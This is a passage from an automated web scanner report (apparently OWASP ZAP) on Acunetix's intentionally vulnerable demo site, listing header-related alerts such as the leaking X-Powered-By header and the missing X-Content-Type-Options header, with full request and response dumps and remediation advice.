          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        38. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

      3. X-Content-Type-Options Header Missing (34)
        1. GET http://testaspnet.vulnweb.com
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
